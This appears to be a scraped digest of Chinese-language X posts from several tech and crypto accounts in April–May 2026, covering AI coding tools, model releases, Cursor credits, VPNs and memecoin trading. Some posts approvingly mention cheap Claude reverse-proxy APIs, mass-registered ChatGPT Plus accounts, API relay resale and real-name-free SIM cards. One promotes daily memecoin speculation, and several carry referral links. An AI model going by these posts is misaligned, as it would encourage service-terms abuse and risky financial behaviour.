x.com/i/article/204921670329…\n[原文链接](https://x.com/CuiMao/status/2049394392776290573)\n\n**[2026-04-29T06:04:54+00:00]**\n> 呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。\n[原文链接](https://x.com/CuiMao/status/2049369313547800804)\n\n**[2026-04-28T18:44:13+00:00]**\n> 干爹发新模型了! 属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,\n[原文链接](https://x.com/CuiMao/status/2049198015232315465)\n\n**[2026-04-28T14:06:08+00:00]**\n> 50000🎉🎉\n[原文链接](https://x.com/CuiMao/status/2049128032661852434)\n\n**[2026-04-28T14:03:04+00:00]**\n> 如果你的claude里面要接deepseek v4 pro,effort一定要拉到max才有效果。官方文档里说的。也挺好,反正这几天四舍五入等于不要钱。\n[原文链接](https://x.com/CuiMao/status/2049127261409034535)\n\n---\n\n### ✅ @0xAA_Science — 0xAA(18 条)\n\n**[2026-05-01T18:31:03+00:00]**\n> 一直想要个越野摩托车,这次张雪出了 MX250,支持一下。\n[原文链接](https://x.com/0xAA_Science/status/2050281865245024365)\n\n**[2026-05-01T16:01:35+00:00]**\n> 我发现 Cursor 额度还挺耐用的,使劲蹬才用掉了 $150,这 $10,000 得用到什么时候? 看起来只有跑类似 auto research 的循环任务才能消耗掉这些 token 了!\n[原文链接](https://x.com/0xAA_Science/status/2050244250563182801)\n\n**[2026-05-01T15:59:10+00:00]**\n> 目前 WTF AI 讨论群已经 700 多人了,如果你的申请没有通过,可以推特私信我你的 TG 昵称。\n[原文链接](https://x.com/0xAA_Science/status/2050243640925233619)\n\n**[2026-05-01T08:23:56+00:00]**\n> 贵州牛肉粉 3u\n[原文链接](https://x.com/0xAA_Science/status/2050129079677145442)\n\n**[2026-04-30T12:47:23+00:00]**\n> 孜然牛肉盖饭 4u\n[原文链接](https://x.com/0xAA_Science/status/2049832988452778343)\n\n**[2026-04-30T04:08:52+00:00]**\n> 昨天 ETH 出了个rug项目 MOGG,开盘最高30M,很快跌到 200k。 最近行情本来就不好,就出了一个火箭狗跑到 200M,剩下都是小打小闹。 大家保护好本金,等待BSC行情回暖吧。\n[原文链接](https://x.com/0xAA_Science/status/2049702500622889410)\n\n**[2026-04-29T16:27:23+00:00]**\n> 君子生非异也,善假于 AI 也。 — A子\n[原文链接](https://x.com/0xAA_Science/status/2049525966628958553)\n\n**[2026-04-29T12:16:05+00:00]**\n> 已经有朋友联系我能提供0.5折的 Claude 反向代理API,还有朋友免费注册了几万个 ChatGPT plus 账号,长见识了。 建了个 WTF AI 电报群,欢迎加入,申请时记得自我介绍下: https://t.me/+ZCnxv1CA0u5jMmU1\n[原文链接](https://x.com/0xAA_Science/status/2049462724216987766)\n\n**[2026-04-28T10:24:33+00:00]**\n> 央视报道了 “渔猎齐哥” Up主,真牛逼啊。 监督环境保护,吾辈义不容辞!\n[原文链接](https://x.com/0xAA_Science/status/2049072268165497033)\n\n**[2026-04-28T05:40:29+00:00]**\n> 青椒肉丝饭 + 老盐百香果 6u\n[原文链接](https://x.com/0xAA_Science/status/2049000780519321906)\n\n**[2026-04-28T03:52:33+00:00]**\n> 快连被墙干服了,关停了中国大陆的服务。 我没用过快联,不过这几天群里都是说快连用不了的,感觉用户很多。 有什么好的 vpn 推荐吗?我其实觉得买个海外服务器,让 AI 帮你自建一个 VPN 更靠谱。\n[原文链接](https://x.com/0xAA_Science/status/2048973617854328890)\n\n**[2026-04-27T08:47:12+00:00]**\n> Meta 对 Manus 的收购被中国发改委驳回。 看来以后要么一开始就出海,要么就不出海。\n[原文链接](https://x.com/0xAA_Science/status/2048685380304871774)\n\n**[2026-04-27T07:30:32+00:00]**\n> RT by @0xAA_Science: 用 @gmgnai 的 skill (获取链上数据) + @xapi_to xapi skill(社交搜索)组合玩玩,做了个异动的meme(异动的老币+新币+多链异动同名币+持续上升币),担心再次错过太空狗等信号~ 有 ai 真方便啊~\n[原文链接](https://x.com/0xAA_Science/status/2048666088733581805)\n\n**[2026-04-27T03:49:07+00:00]**\n> 狗B们在组团在 bags 分流太空狗,好恶心啊。 下次它们买什么,咱们就去找个新盘子分,好吗?\n[原文链接](https://x.com/0xAA_Science/status/2048610365324623966)\n\n**[2026-04-26T07:01:25+00:00]**\n> 给 auth2api 加了对 openai/codex 账号的授权支持,等审核完成就会合并。 另外最近 xAPI 也在探索 AI 中转业务,有中转站和号商资源的可以联系我,我建个AI中转交流群,方便大家沟通。 https://github.com/AmazingAng/auth2api\n[原文链接](https://x.com/0xAA_Science/status/2048296373569941533)\n\n**[2026-04-26T04:15:19+00:00]**\n> 感觉 gpt 5.5 的 plan 能力比 opus 4.7 要强。 opus 总是吭哧吭哧搞个很复杂的方案,gpt 给的plan 更简单并能达到同样效果。\n[原文链接](https://x.com/0xAA_Science/status/2048254571622113742)\n\n**[2026-04-26T02:36:56+00:00]**\n> 川普的命真是硬啊,在白宫记者晚宴遭遇枪击,结果又平安无事! 枪手 Cole Allen,来自加州,曾经被评为月度最佳教师。\n[原文链接](https://x.com/0xAA_Science/status/2048229814172275062)\n\n**[2026-04-25T04:05:21+00:00]**\n> 卧槽,收到 Cursor 送的 10,000u AI 额度! 昨天 @edwinarbus 联系我送额度的时候,我还以为是骗子。不过挂着 cursor 的标,而且只是要个邮箱,我抱着试一试的态度回复了,没想道还真送了! 这个月要多 vibe coding 些狗屎了! @VibeShit_Org @cursor_ai\n[原文链接](https://x.com/0xAA_Science/status/2047889676867080420)\n\n---\n\n### ✅ @dingyi — Ding(20 条)\n\n**[2026-05-01T13:04:04+00:00]**\n> Stop making coding agents... https://www.dpcode.cc/\n[原文链接](https://x.com/dingyi/status/2050199576603468134)\n\n**[2026-05-01T08:57:02+00:00]**\n> 这个音频组件库做得太完美了。 https://audio.raphaelsalaja.com/\n[原文链接](https://x.com/dingyi/status/2050137408268886450)\n\n**[2026-05-01T07:05:58+00:00]**\n> 新时代的设计灵感聚合站,应该长这样。把网站的设计样式都变成了 design.md https://styles.refero.design/\n[原文链接](https://x.com/dingyi/status/2050109458957947150)\n\n**[2026-05-01T04:13:08+00:00]**\n> 假新闻、任何虚假的东西,总是能获得更多关注。这对吗?\n[原文链接](https://x.com/dingyi/status/2050065962855182350)\n\n**[2026-05-01T02:11:02+00:00]**\n> 老奶奶 vibe 大法果然好用。\n[原文链接](https://x.com/dingyi/status/2050035236487172404)\n\n**[2026-04-30T15:37:12+00:00]**\n> The future of product design.\n[原文链接](https://x.com/dingyi/status/2049875727689146789)\n\n**[2026-04-30T09:46:26+00:00]**\n> 最近刷推,像是逛街,中转站一条街。。。全是自卖自夸吆喝的。(无恶意就是描述一种景象\n[原文链接](https://x.com/dingyi/status/2049787450290287014)\n\n**[2026-04-30T05:57:17+00:00]**\n> Pinned: 尼玛被拉了几个所谓的榜单,发现我的人设被人们定义为产品推广专家了。。。 其实我们主要帮企业做网站,以前服务过不少 Web3 公司,但现在那个行业已死,业务很少了。如果有 AI 或独立开发者需要设计方面的服务,可以来私聊。 https://vibeflow.co/\n[原文链接](https://x.com/dingyi/status/2049729786726302168)\n\n**[2026-04-30T04:49:20+00:00]**\n> 厉害啊,喜欢什么就去做什么👍\n[原文链接](https://x.com/dingyi/status/2049712686238445579)\n\n**[2026-04-30T02:36:24+00:00]**\n> 现在任何网站,其实 AI 只能做到颜色、布局、字体的复刻,Google 的 design.md 也只能做到这一步。原版里面那些精妙的动画,很多细节的东西,AI 永远都做不了。这才是设计师的价值。\n[原文链接](https://x.com/dingyi/status/2049679228908793921)\n\n**[2026-04-30T00:32:54+00:00]**\n> 2026年了,如果一个“人”突然积极回复你的每一条内容,只有一种可能:他用 AI 自动回复的。点进他主页一看,同一时间,同时回复了十几个人。 上一次有人这么积极回复,还是因为爱情。。。\n[原文链接](https://x.com/dingyi/status/2049648150605123629)\n\n**[2026-04-29T15:13:45+00:00]**\n> Ling-2.6-flash is now open-source! A 104B MoE (7.4B active) built for agents. Ling-2.6-1T will follow today. Hugging Face: https://huggingface.co/inclusionAI/Ling-2.6-flash ModelScope: https://models…\n[原文链接](https://x.com/dingyi/status/2049507438156787936)\n\n**[2026-04-29T09:38:53+00:00]**\n> 这个动效设计 skills 真好! npx skills add jakubantalik/transitions-dev\n[原文链接](https://x.com/dingyi/status/2049423162933395583)\n\n**[2026-04-29T03:49:14+00:00]**\n> 我就知道🤣🤣🤣\n[原文链接](https://x.com/dingyi/status/2049335171066061234)\n\n**[2026-04-29T01:47:21+00:00]**\n> Ghostty 离开 GitHub,同一天 Warp 宣布开源。 Warp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。 还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!\n[原文链接](https://x.com/dingyi/status/2049304499093946475)\n\n**[2026-04-28T22:59:18+00:00]**\n> 我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。 https://fatetell.com/zh-CN/invite?referral=QQE5QT\n[原文链接](https://x.com/dingyi/status/2049262208241332358)\n\n**[2026-04-28T16:58:50+00:00]**\n> So good!\n[原文链接](https://x.com/dingyi/status/2049171494329065493)\n\n**[2026-04-28T16:40:15+00:00]**\n> 最喜欢的硅谷科技公司之一 Poolside 发布模型了!他们的网站设计简直是艺术品。 https://poolside.ai/\n[原文链接](https://x.com/dingyi/status/2049166818452160778)\n\n**[2026-04-28T15:07:51+00:00]**\n> 周末刚说完 Cursor 很聪明,小米马上就学会了。免费给一个月会员,也没几个钱,不管谁申请都秒过,相当于请所有网友免费宣传,万一还有不少人忘了关掉自动续费,反而还赚了🤣 我感觉以后所有模型厂商都学会这招了,再也没有他们的商单了。。。\n[原文链接](https://x.com/dingyi/status/2049143565260042558)\n\n**[2026-04-28T11:59:03+00:00]**\n> 之前买过 ZenMux 速度还是挺快的, 算是 OpenRouter alternative 吧。咱也不是很懂,感觉既然能上 OpenCode 的第三方列表,说明还是比较正规和靠谱的吧? 目前 DeepSeek V4 限时免费体验:https://zenmux.ai/invite/RUR17S\n[原文链接](https://x.com/dingyi/status/2049096050158551248)\n\n---\n\n### ✅ @GoSailGlobal — Jason Zhu(20 条)\n\n**[2026-05-01T15:43:21+00:00]**\n> R to @GoSailGlobal: 提示词: Rework the given image into a crayon-style illustration, transforming the entire scene into something that feels hand-drawn by a 10-year-old. Keep the forms simple and slight…\n[原文链接](https://x.com/GoSailGlobal/status/2050239662288146865)\n\n**[2026-05-01T15:43:21+00:00]**\n> 海外疯玩的prompt 可以用来给自己的profile,生成一个十岁小孩的蜡笔画 提示词放下面👇(截图+pormpt就行):\n[原文链接](https://x.com/GoSailGlobal/status/2050239659377295552)\n\n**[2026-05-01T15:30:01+00:00]**\n> 发现海外的人真牛逼,AI真的可以做游戏啦❗️❗️ 这是 AI 做整套游戏角色目前唯一能跑通的工作流 99% 的人卡在 walk cycle(走路循环动画,左右腿交替的连续动作)上,是因为他们一直试图用 GPT Image 2.0(OpenAI 最新的图像生成模型)/ Nano Banana 2(Google Gemini 的图像生成模型代号)解决 无论怎么 prompt(给 AI 的文字指令)、…\n[原文链接](https://x.com/GoSailGlobal/status/2050236307721584945)\n\n**[2026-05-01T12:48:53+00:00]**\n> 英文圈 freelancer 每月从客户那拿 $5K-$25K 做的事 Anthropic 官方在一个 30 分钟的视频里全讲完了 中文圈知道的人不到 1%,传开就没差价了 他们做的就一件事 把 Claude Code SDK + GitHub Action 接到客户自己的代码仓库里,做成一套自动化的工程流水线 为什么客户愿意为这个付钱? 不是 AI 写代码这件事值钱,是「把 AI 放进生产环境…\n[原文链接](https://x.com/GoSailGlobal/status/2050195755936448705)\n\n**[2026-05-01T12:33:04+00:00]**\n> 大部分人的 RAG 系统,只检索一次就完事了——这可能是你效果上不去的最大原因。 via @omarsar0 这条帖子讲的是「推理过程中什么时候该去检索」,AI 开发者建议收藏。 核心观点拆解: 1️⃣ 多数 RAG 系统的做法是:用户提问 → 检索一次 → 丢给模型生成答案。一锤子买卖,检索质量不够,后面全白搭。 2️⃣ 更好的思路是在推理过程中动态触发检索——模型推到一半发现信息不够,再去拿…\n[原文链接](https://x.com/GoSailGlobal/status/2050191775881736409)\n\n**[2026-05-01T12:21:44+00:00]**\n> 孙割是真割啊 我是懒得去试 积分额度随便调,背后调度可想而知😅\n[原文链接](https://x.com/GoSailGlobal/status/2050188921665941984)\n\n**[2026-05-01T10:05:55+00:00]**\n> GPT 5.5 可以通过设定目标和指标 自行迭代优化🔁\n[原文链接](https://x.com/GoSailGlobal/status/2050154742480040440)\n\n**[2026-05-01T07:53:41+00:00]**\n> Spotify真的挺有意思的 为人类艺术家打上了“验证”标签 是不是太多AI生成了。 看来AI Generate的标识已经打不过来,甚至分辨不出来了\n[原文链接](https://x.com/GoSailGlobal/status/2050121466021363878)\n\n**[2026-05-01T07:49:04+00:00]**\n> OpenAI 要分家了 山姆(Sam)醉酒发推 GitHub 要完蛋了 Anthropic 还是老样子 播客也挺难的,支持一下\n[原文链接](https://x.com/GoSailGlobal/status/2050120304203317373)\n\n**[2026-05-01T05:58:11+00:00]**\n> 硅谷101 这期 DeepSeek,我反复看了 3 遍 陈茜也转发了我的推文 3 个细节没人注意到,但对我们做出海/独立开发的影响最大: 1️⃣ DeepSeek 全员 ~150 人,正面打 OpenAI 1000+ 出海产品从来不是\"等团队够大\",是\"敢做\" 我 1 个人 3 个月上了 4 个出海工具,靠的就是 Cursor + DeepSeek API + 不内耗 2️⃣ 幻方 7 年量化背…\n[原文链接](https://x.com/GoSailGlobal/status/2050092401004564952)\n\n**[2026-05-01T04:54:26+00:00]**\n> x.com/i/article/204974561199…\n[原文链接](https://x.com/GoSailGlobal/status/2050076357296824737)\n\n**[2026-05-01T04:51:28+00:00]**\n> 今天看了 @GabiExplores 的两个项目: stitch-kit · 22 ★ · Google Stitch MCP 完整设计 pipeline,35 skill / 5 层架构,覆盖 6 个 agent 平台 slopbuster · 2 ★ · AI 文本去痕迹,含市面上唯一的 code 去 AI 味(comment / commit / naming),引用 4 篇 LLM 检测…\n[原文链接](https://x.com/GoSailGlobal/status/2050075607707586658)\n\n**[2026-05-01T03:08:51+00:00]**\n> 🤔赚钱 -> 美股,长持复利 2月开始关注上英特尔的,后面又加仓 陈立武真是英特尔的福星\n[原文链接](https://x.com/GoSailGlobal/status/2050049784094855501)\n\n**[2026-04-30T16:25:11+00:00]**\n> 👀回顾来时路 从这条推文开始,进行了9个月的日更推文 经历了内容方向的摸索、带人X增长与知识付费和自身X增长矛盾的时期、B端业务探索 算是找到了点出路 离职的可以参考下,在职的也要掂量下\n[原文链接](https://x.com/GoSailGlobal/status/2049887802863583240)\n\n**[2026-04-30T16:02:00+00:00]**\n> Naval 讲了一句让我转身就去打开 Cursor 的话 电子游戏给你的是假奖励真多巴胺 vibe coding 给你的是真奖励真多巴胺 游戏让你卡在能力边缘,但世界是别人造的,迟早通关 vibe coding 底下跑的是图灵机,无界,目标自己定,做出来的东西是真的 他一批朋友因此\"消失了\",钻进去做自己想了很多年的那个 app 他自己也在一个人重做 Airchat 而最难的不是写代码,是知道你…\n[原文链接](https://x.com/GoSailGlobal/status/2049881966850499058)\n\n**[2026-04-30T15:58:18+00:00]**\n> Mitchell(Vagrant、Terraform、Ghosty 的作者)今天宣布离开 GitHub GitHub 第 1299 号用户,注册 18 年,几乎没断过一天 他说写完离别帖,眼泪滴到了键盘上 不是矫情,是 GitHub 真的快不能用了 最近两周连续翻车 1️⃣ 4 月 23 日 merge queue 出 bug,2800 多个 PR 被静默撤回,已经合进主干的代码凭空消失 2️⃣…\n[原文链接](https://x.com/GoSailGlobal/status/2049881037547999546)\n\n**[2026-04-30T15:25:23+00:00]**\n> ChatGPT 还在让你复制粘贴的时候,Gemini 已经把活儿干完了 昨天 Google 悄悄上线了一个功能:在对话框里直接生成文件,你让他帮你写一份 budget,它是真的给你导出 Excel 支持的格式一口气拉满: PDF / Word / Excel Google Docs / Sheets / Slides LaTeX / CSV / TXT / RTF / Markdown 操作只有…\n[原文链接](https://x.com/GoSailGlobal/status/2049872749850665004)\n\n**[2026-04-30T14:44:27+00:00]**\n> x.com/i/article/204974126036…\n[原文链接](https://x.com/GoSailGlobal/status/2049862449474740224)\n\n**[2026-04-30T13:24:32+00:00]**\n> RT by @GoSailGlobal: x.com/i/article/204984109084…\n[原文链接](https://x.com/GoSailGlobal/status/2049842340056174762)\n\n**[2026-04-29T17:43:48+00:00]**\n> RT by @GoSailGlobal: Starting today, agents can now be Cloudflare customers. They can create a Cloudflare account, start a paid subscription, register a domain, and get back an API token to deploy co…\n[原文链接](https://x.com/GoSailGlobal/status/2049545195914498139)\n\n---\n\n### ✅ @frxiaobei — 凡人小北(16 条)\n\n**[2026-05-01T07:35:11+00:00]**\n> 这几周 Codex 常驻电脑,已经很久没有打开 ChatGPT 了。 推荐一下插件和自动化,很上头。\n[原文链接](https://x.com/frxiaobei/status/2050116811769954778)\n\n**[2026-04-29T22:32:26+00:00]**\n> RT by @frxiaobei: x.com/i/article/204961669954…\n[原文链接](https://x.com/frxiaobei/status/2049617833370202182)\n\n**[2026-04-29T15:48:47+00:00]**\n> 刚好今天下午跟团队开会,聊到了 Symphony。 过去这段时间团队手搓了一套系统,想解决一个很现实的问题: 别再让产品和技术被各自的工具链锁住了。 现阶段虽然 AI Coding 大家虽然玩的很溜,但认知上还未对齐,还在遵守老的规范,产品做需求,做完需求评审,评审完以后技术守着 codex、claude code 或者 cursor 这种本地工具,开发协作还是靠人肉对齐,整个过程其实很割裂,效…\n[原文链接](https://x.com/frxiaobei/status/2049516252281135554)\n\n**[2026-04-29T14:43:40+00:00]**\n> RT by @frxiaobei: We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor. Run agents from CI/CD pipelines, create automations for end-to…\n[原文链接](https://x.com/frxiaobei/status/2049499866217185492)\n\n**[2026-04-28T16:56:00+00:00]**\n> 我现在基本不太直接用 Agent了。 介绍下我的AI 搭档,Finn。 现在大部分情况是 Finn 让 Agent 去干活。 工作流其实挺简单的: 我现在会现在 Codex (之前是 Claude Code) 里把一个 Agent 或者 skill 调好,跑到稳定。 然后直接丢给 OpenClaw,后面基本就不太管了 这一步挺关键的。 不然你会发现一个很烦的事情: 你要跟一堆 Agent 来回对…\n[原文链接](https://x.com/frxiaobei/status/2049170782170042513)\n\n**[2026-04-28T16:07:28+00:00]**\n> 现在远程面试可以更干脆了。 面试官当甲方出需求, 应聘者打开 Codex / Claude Code, 直接共享屏幕开始干。 半小时什么都看清了。\n[原文链接](https://x.com/frxiaobei/status/2049158565487935850)\n\n**[2026-04-28T15:53:41+00:00]**\n> 雷老板是懂营销的, 本着拿人 token,替人带货的原则, 替 Xiaomi MiMo 喊个话。\n[原文链接](https://x.com/frxiaobei/status/2049155099071750164)\n\n**[2026-04-28T13:41:13+00:00]**\n> 图像类产品现在分两派: 把单次生成做到极致,和把整个视觉工作流跑通。 flowith 明显是后者,还顺手把视频给 seedance 出来了。 关键是底层就是 image2,而且不止这一个模型。 不管底层怎么换,上层工作流都很稳。 单点极致 + 工作流闭环,两派合一。 对我这种普通用户非常有价值。\n[原文链接](https://x.com/frxiaobei/status/2049121762009632774)\n\n**[2026-04-28T05:05:35+00:00]**\n> Claude Code 最近放飞得厉害,“Let 我”是哪国语言,是被 chinglish 污染了吧。\n[原文链接](https://x.com/frxiaobei/status/2048991998275965022)\n\n**[2026-04-27T16:45:39+00:00]**\n> RT by @frxiaobei: A completely local agent that lives right inside your browser. Powered by Gemma 4 E2B and WebGPU, it uses native tool calling to: 🔍 Search browsing history 📄 Read and summarize page…\n[原文链接](https://x.com/frxiaobei/status/2048805789788413984)\n\n**[2026-04-27T16:44:03+00:00]**\n> Amazing\n[原文链接](https://x.com/frxiaobei/status/2048805385537306677)\n\n**[2026-04-27T16:32:39+00:00]**\n> OpenClaw 4.1x 后对于 GPT 的支持上了一个大台阶,之前只说不干的毛病基本没了。 但是我修改了点 soul 文件里的内容后,他现在讲话总“卧槽”是怎么回事儿。 像极了刚走向社会的二愣子。\n[原文链接](https://x.com/frxiaobei/status/2048802517237350599)\n\n**[2026-04-27T16:24:39+00:00]**\n> OpenClaw 这么频繁的发版,我一开始以为他们掌握了什么自动化测试的黑科技,直到我最近做了两次升级。 😤 虽然 AI 时代讲究一个快,但好歹咱尊重下测试环节。\n[原文链接](https://x.com/frxiaobei/status/2048800504206282887)\n\n**[2026-04-26T19:41:23+00:00]**\n> RT by @frxiaobei: Yes, Obsidian Reader works for X articles and threads using the browser extension. We're also making improvements to the share sheet in Obsidian 1.13 so you'll be able to save more …\n[原文链接](https://x.com/frxiaobei/status/2048487623250063516)\n\n**[2026-04-26T11:39:25+00:00]**\n> RT by @frxiaobei: 1:我做了一张「项目」图 汇报用的 PPT 图之类的! 2:但是甲方需要 4K 图。或者 PSD 图层! 3:于是我试着在 GPT 里面让它给我 做PSD 分层文件。 MD 居然给我做了!改给了我一个分层压缩包! 4:里面的图片居然是 4K 尺寸的! 5:所以我们能通过这个方法获得 GPT 的 4K 图片!\n[原文链接](https://x.com/frxiaobei/status/2048366332639674706)\n\n**[2026-04-26T08:35:15+00:00]**\n> RT by @frxiaobei: 一次体检,算不上全量啊。多次体检,基因组,衰老时钟,CGM,可穿戴,得全整起来给AI。直接看看这个 https://orviva.ai, Health memory for AI\n[原文链接](https://x.com/frxiaobei/status/2048319988826820941)\n\n---\n\n### ✅ @gkxspace — 余温(13 条)\n\n**[2026-05-01T12:00:26+00:00]**\n> Gemini会员每个月能领谷歌云额度,别忘啦,Pro10美金/月,Ultra100美金/月 一次有效期一年,用不到就先攒着吧😄 https://me.developers.google.com/benefits?hl=zh-cn\n[原文链接](https://x.com/gkxspace/status/2050183561316016186)\n\n**[2026-04-30T02:35:33+00:00]**\n> 截图软件就推荐 PixPin,功能很丰富: 1、截图一键贴在桌面:当做临时便签,很多博主会用 2、长截图:整个网页/长文档一张图就搞定了 3、OCR:截图文字可拷贝,并且完全本地识别 4、GIF图/录屏:录一段操作、制作GIF图 Win / Mac 都有,而且也免费。\n[原文链接](https://x.com/gkxspace/status/2049679016764833893)\n\n**[2026-04-29T01:38:07+00:00]**\n> R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人” 技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作 更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性\n[原文链接](https://x.com/gkxspace/status/2049302176900501544)\n\n**[2026-04-28T14:39:43+00:00]**\n> 刚看了郭宇的访谈,提到六个月之后或许就不需要人再工作了,知识工作者应该享受这仅有的六个月。 我并不觉得这是危言耸听,因为按照目前这个阶段,整个发展其实不难看出来。 Claude Code、Skills、OpenClaw,不都在向全自动化发展。 如果再有一次大的模型迭代,下一个颠覆性的产品出现,或许知识工作者的工作真的能完全被 AI 取代。 现在 AI Coding 的能力已经非常非常强了,你做出…\n[原文链接](https://x.com/gkxspace/status/2049136483106230523)\n\n**[2026-04-28T11:08:05+00:00]**\n> 这个 Codex 教程很不错,新手值得一看。 作者一个人演示并行推进 6 个项目:iOS App、React 落地页、Remotion 视频、投资人 Deck、移动端设计稿、Twitter 自动发帖。 5 个有用的技巧: ①Codex 是一个 AI 代理调度中心:编码、文档、浏览器、计算机控制全在一个界面里。你可以同时给多个 AI 代理下指令。 ②插件是别人给你的能力,skills是你自己造的能…\n[原文链接](https://x.com/gkxspace/status/2049083226463797284)\n\n**[2026-04-28T10:26:08+00:00]**\n> 我的 mac 的工作区,这几个都是必不可缺,看来大家差不多,还有没安装的快装一下: 1. Obsidian:用来做内容存档、搭建个人知识库 2. cc-swtich:管理多个 CLI 工具,管理多家模型供应商 3. Codex :最近更新很频繁,体验也越来越好,而且不封号 4. Ghostty:一个非常丝滑的终端,推荐~ 5. 闪电说 + Typless:前者非结构化,后者结构化,配合使用很爽 …\n[原文链接](https://x.com/gkxspace/status/2049072666385006919)\n\n**[2026-04-26T14:41:16+00:00]**\n> 牛逼,卡神又出教程了 4美分/天、KiteSim香港卡,免实名+独享虚拟号 马上跟着教程申请一张!!!\n[原文链接](https://x.com/gkxspace/status/2048412096665145411)\n\n**[2026-04-25T16:04:44+00:00]**\n> R to @gkxspace: agent.creao.ai/signup?ref=Ws…\n[原文链接](https://x.com/gkxspace/status/2048070713601376712)\n\n**[2026-04-25T13:45:29+00:00]**\n> R to @gkxspace: x.com/gkxspace/status/204803…\n[原文链接](https://x.com/gkxspace/status/2048035672078844248)\n\n**[2026-04-25T13:44:55+00:00]**\n> 用 CREAO AI 一句话直接做出来的一个电商智能体,这个效果有点太离谱了。 简直就是小白福音,还内嵌了平常会用到的各种API,不用折腾各种API KEY,支持云端一键部署,太强了。 我的提示词: 我需要一个智能体实现:电商新品从0到上架 选品→找供应商→写详情页→生产品图→定价→广告文案,全套\n[原文链接](https://x.com/gkxspace/status/2048035527459319854)\n\n**[2026-04-25T13:32:58+00:00]**\n> 生财有术、得到新商学,哪个更好一些 最近都在折扣阶段,生财2765、得到2888,还没进过这种大的社群,尝试一下 你会选生财、得到、生财+得到都要,或者还有更好的推荐吗🤔\n[原文链接](https://x.com/gkxspace/status/2048032521942626343)\n\n**[2026-04-25T06:15:53+00:00]**\n> 去了趟书店,被震惊了,到底谁在买这些书啊😅\n[原文链接](https://x.com/gkxspace/status/2047922526685155786)\n\n**[2026-04-25T04:13:59+00:00]**\n> RT by @gkxspace: Cursor官方认证博主✅ 你值得关注 11位晒Cursor $10,000额度博主,按X发帖时间大致排序 1️⃣ 铁锤人 (@lxfater) 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人 推文链接:https://x.com/lxfater/status/204773843982373309…\n[原文链接](https://x.com/gkxspace/status/2047891848908472433)\n\n---\n\n### ✅ @Stv_Lynn — Steven Lynn(9 条)\n\n**[2026-05-01T18:47:37+00:00]**\n> Media\n[原文链接](https://x.com/Stv_Lynn/status/2050286033552736527)\n\n**[2026-04-29T23:26:38+00:00]**\n> 今日在大阪,欢迎约饭👋\n[原文链接](https://x.com/Stv_Lynn/status/2049631472693448778)\n\n**[2026-04-29T16:12:16+00:00]**\n> 到香港后发现带的是大陆转英标的插座,崩溃\n[原文链接](https://x.com/Stv_Lynn/status/2049522162411995640)\n\n**[2026-04-27T10:37:36+00:00]**\n> Image\n[原文链接](https://x.com/Stv_Lynn/status/2048713165232644251)\n\n**[2026-04-25T18:40:34+00:00]**\n> R to @Stv_Lynn: github.com/stvlynn/quote-bud…\n[原文链接](https://x.com/Stv_Lynn/status/2048109932751560818)\n\n**[2026-04-25T18:40:33+00:00]**\n> R to @Stv_Lynn: 3. 逆向了 Quote 的官方固件,成功实现了 USB 写入图像\n[原文链接](https://x.com/Stv_Lynn/status/2048109929203212615)\n\n**[2026-04-25T18:40:31+00:00]**\n> Cursor 送的 10000 刀,我拿来做了什么 昨天被 @cursor_ai 投喂了,于是决定好好记录一下与 Cursor 3 共创的全部过程。以下是第一天花掉 121 刀的记录 1. 写了个主页 想起来上一个主页还是去年拿 opus-3.7 写的,刚好通过 Cursor 用 GPT-5.5 重构 (文案请忽略不代表最终效果) 感觉吃上细糠了!\n[原文链接](https://x.com/Stv_Lynn/status/2048109919266852875)\n\n**[2026-04-25T12:08:29+00:00]**\n> RT by @Stv_Lynn: 最近校招面试了不少 985 实习生,一个很强烈的感受是:AI 工具正在把学生之间的资源差距快速放大。 从我这段时间的感受看,差距真的可能到 5 倍。那些明显领先很多的同学,无一例外都比较早接触了 Claude Code、Codex 这类最好的 AI Coding 工具,也愿意自己花钱订阅。他们不只是会用工具,而是已经把它们变成了日常学习和开发的一部分。聊模型、工…\n[原文链接](https://x.com/Stv_Lynn/status/2048011261473128477)\n\n**[2026-04-25T05:23:57+00:00]**\n> 忘了说了其实我也有👉👈 感谢 @cursor_ai ,这周尽快把 Stakka 给 ship 出来!\n[原文链接](https://x.com/Stv_Lynn/status/2047909458484040105)\n\n---\n\n### ✅ @chuxiaeth — 初夏(10 条)\n\n**[2026-04-30T01:50:25+00:00]**\n> ✅好用的VPN梯子推荐 最近很多朋友问我梯子怎么选,我自己踩过不少坑。快连以前还行,但现在真的太卡了,除了还没跑路,基本什么毛病都占全了,高峰期根本连不上。 我自己试下来,目前还算稳定的有三个,分享给大家参考: 1️⃣ QuickQ——整体运行比较流畅,日常刷推、看行情、视频都不太会断。缺点是偏贵,一年大概800元,最多同时挂三台设备,适合个人主力使用。 2️⃣ 奶昔——老牌子之一,速度和稳定性…\n[原文链接](https://x.com/chuxiaeth/status/2049667657251934282)\n\n**[2026-04-30T00:46:21+00:00]**\n> 🧠 你以为的币圈财富自由: 在 AAVE 里存 500 万美金,每天躺赚几百刀利息,结果 AAVE 差点出大问题,钱包差点归零,每天那点利息最后发现是把本金放在火山口上烤🔥 👇 真正的币圈财富自由: 500 万美金,全放链上钱包,不存任何协议,不图那点所谓的稳定收益。每天拿 1000 美金冲链,Solana 土狗、ETH 土狗、BSC 土狗,轮着扫🧵 💥 核心纪律(必须遵守): 1. 亏损 20…\n[原文链接](https://x.com/chuxiaeth/status/2049651534003351701)\n\n**[2026-04-29T04:52:50+00:00]**\n> 🧵 